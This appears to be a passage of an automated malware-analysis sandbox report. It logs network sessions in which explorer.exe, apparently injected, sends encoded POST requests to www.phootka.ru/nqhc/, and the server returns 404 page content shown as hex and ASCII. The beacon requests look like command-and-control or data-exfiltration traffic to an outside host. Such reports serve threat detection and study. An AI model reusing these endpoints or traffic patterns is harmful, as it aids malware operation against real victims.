                                                                                                                                                                          Dec 5, 2022 15:17:33.287242889 CET11873INData Raw: 63 68 5f 5f 6c 61 62 65 6c 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 70 61 64 64 69 6e 67 3a 38 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30
                                                                                                                                                                          Data Ascii: ch__label{width:100%}.wp-block-search__input{padding:8px;flex-grow:1;margin-left:0;margin-right:0;min-width:3em;border:1px solid #949494;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{mar
                                                                                                                                                                          Dec 5, 2022 15:17:33.287338972 CET11874INData Raw: 70 78 7d 40 6d 65 64 69 61 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 2c 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64
                                                                                                                                                                          Data Ascii: px}@media (-webkit-min-device-pixel-ratio:2),(min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}:root .has-very-lig
                                                                                                                                                                          Dec 5, 2022 15:17:33.287420034 CET11876INData Raw: 2e 68 61 73 2d 68 75 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63
                                                                                                                                                                          Data Ascii: .has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear
                                                                                                                                                                          Dec 5, 2022 15:17:33.287499905 CET11876INData Raw: 6f 70 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68
                                                                                                                                                                          Data Ascii: op-style:solid}html :where([style*=border-right-width]){border-right-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[class*=wp-imag
                                                                                                                                                                          Dec 5, 2022 15:17:33.287578106 CET11877INData Raw: 34 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30
                                                                                                                                                                          Data Ascii: 4000<style id='global-styles-inline-css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf
                                                                                                                                                                          Dec 5, 2022 15:17:33.449146986 CET11879INData Raw: 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28
                                                                                                                                                                          Data Ascii: 00%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,r


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          47192.168.11.2049889195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:38.679825068 CET11915OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.phootka.ru
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.phootka.ru
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.phootka.ru/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 71 7a 73 4a 57 71 35 6b 67 56 6c 4e 30 30 74 7a 54 4a 7e 72 30 38 51 59 39 58 46 69 39 5a 33 54 5a 69 32 4f 42 71 77 42 77 57 32 67 68 45 5a 36 6e 37 31 4e 41 37 76 47 31 48 68 53 62 39 56 2d 78 51 73 74 38 41 4d 59 73 67 65 54 6b 6d 7a 53 28 35 79 34 79 63 79 6f 76 72 64 39 35 6c 6e 44 49 5a 28 51 4f 71 48 6f 37 76 37 38 53 31 67 53 46 58 62 63 56 50 74 30 47 6e 42 79 68 56 62 52 6e 53 6a 65 39 58 72 68 34 6b 73 36 50 4d 4c 35 4e 6d 4e 76 4e 4e 64 5f 5a 37 30 4c 50 49 6d 74 6a 55 4c 41 4e 45 7a 2d 44 4f 33 37 71 68 7a 34 66 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=qzsJWq5kgVlN00tzTJ~r08QY9XFi9Z3TZi2OBqwBwW2ghEZ6n71NA7vG1HhSb9V-xQst8AMYsgeTkmzS(5y4ycyovrd95lnDIZ(QOqHo7v78S1gSFXbcVPt0GnByhVbRnSje9Xrh4ks6PML5NmNvNNd_Z70LPImtjULANEz-DO37qhz4fA).
                                                                                                                                                                          Dec 5, 2022 15:17:38.727799892 CET11916INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:38 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 39481
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                          Dec 5, 2022 15:17:38.727895975 CET11918INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                          Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                          Dec 5, 2022 15:17:38.727972031 CET11919INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                          Dec 5, 2022 15:17:38.728043079 CET11920INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                          Dec 5, 2022 15:17:38.728099108 CET11922INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                          Dec 5, 2022 15:17:38.728207111 CET11923INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                          Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                          Dec 5, 2022 15:17:38.728389025 CET11924INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                          Dec 5, 2022 15:17:38.728507042 CET11926INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                          Dec 5, 2022 15:17:38.728631973 CET11927INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                          Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                          Dec 5, 2022 15:17:38.728702068 CET11928INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                          Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                          Dec 5, 2022 15:17:38.774024963 CET11930INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                          Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          48192.168.11.2049890195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:40.743613958 CET11957OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.phootka.ru
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.phootka.ru
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.phootka.ru/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 71 7a 73 4a 57 71 35 6b 67 56 6c 4e 75 55 39 7a 55 71 57 72 34 4d 51 66 33 33 46 69 79 35 32 59 5a 69 79 4f 42 75 70 61 78 67 6d 67 68 6d 42 36 6f 61 31 4e 4a 72 76 47 39 6e 67 61 55 64 55 38 78 51 6f 4c 38 46 30 59 73 67 4b 54 6c 54 76 53 6f 35 79 37 39 38 7a 61 6e 4c 64 2d 39 6c 6e 4a 49 5a 7a 6d 4f 75 48 6f 38 65 58 38 52 33 49 53 48 31 7a 64 66 50 74 79 41 6e 42 78 6f 31 62 50 6e 53 76 57 39 57 54 78 34 33 77 36 4f 76 54 35 66 57 4e 73 48 39 63 31 52 62 31 70 49 34 37 49 6b 6e 7a 6c 56 55 76 4d 41 5f 72 73 6e 68 75 72 64 54 58 4d 79 7a 56 71 53 41 43 36 58 75 66 65 66 70 6a 72 78 31 59 53 41 73 55 56 42 4d 53 36 78 6c 79 47 75 62 76 61 52 59 33 53 34 35 66 74 44 77 64 4d 5a 32 75 53 7a 65 66 32 66 79 52 4d 57 68 50 5a 74 34 44 6f 64 4a 45 6a 50 38 6c 52 76 32 5a 41 57 33 53 36 53 6b 49 77 53 56 4c 4a 47 53 37 77 6f 65 50 4a 76 42 4d 64 77 48 46 45 67 4c 73 6c 62 67 4b 61 6a 57 7e 33 41 31 55 61 44 76 61 55 79 43 39 52 73 33 46 49 78 70 45 70 43 5a 61 6e 34 48 45 6d 66 47 75 66 54 54 78 59 35 6f 58 31 4d 30 63 43 55 47 34 66 6e 48 42 70 33 58 53 41 45 55 75 45 71 4f 56 52 59 69 46 62 49 74 4a 70 31 50 59 59 6b 35 5a 61 4b 62 57 55 43 33 73 4f 33 4e 59 56 62 65 42 73 45 6f 42 4a 51 50 35 61 58 76 7a 45 46 5f 57 46 28 38 55 31 49 35 58 47 6d 7a 51 68 63 35 66 6c 43 56 69 4d 44 55 33 4c 4a 4b 76 72 70 6e 56 33 4d 42 77 43 4a 64 71 4d 6d 55 73 34 76 41 64 51 6a 6a 44 6f 57 58 73 2d 70 77 39 6d 6b 69 33 61 49 79 55 6c 73 77 35 62 7a 41 51 4c 43 32 59 45 41 4e 53 70 58 47 59 62 72 4b 39 38 43 77 68 54 59 55 52 57 4f 38 4f 38 43 76 55 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=qzsJWq5kgVlNuU9zUqWr4MQf33Fiy52YZiyOBupaxgmghmB6oa1NJrvG9ngaUdU8xQoL8F0YsgKTlTvSo5y798zanLd-9lnJIZzmOuHo8eX8R3ISH1zdfPtyAnBxo1bPnSvW9WTx43w6OvT5fWNsH9c1Rb1pI47IknzlVUvMA_rsnhurdTXMyzVqSAC6Xufefpjrx1YSAsUVBMS6xlyGubvaRY3S45ftDwdMZ2uSzef2fyRMWhPZt4DodJEjP8lRv2ZAW3S6SkIwSVLJGS7woePJvBMdwHFEgLslbgKajW~3A1UaDvaUyC9Rs3FIxpEpCZan4HEmfGufTTxY5oX1M0cCUG4fnHBp3XSAEUuEqOVRYiFbItJp1PYYk5ZaKbWUC3sO3NYVbeBsEoBJQP5aXvzEF_WF(8U1I5XGmzQhc5flCViMDU3LJKvrpnV3MBwCJdqMmUs4vAdQjjDoWXs-pw9mki3aIyUlsw5bzAQLC2YEANSpXGYbrK98CwhTYURWO8O8CvU.
                                                                                                                                                                          Dec 5, 2022 15:17:40.790687084 CET11959INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:40 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 39481
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
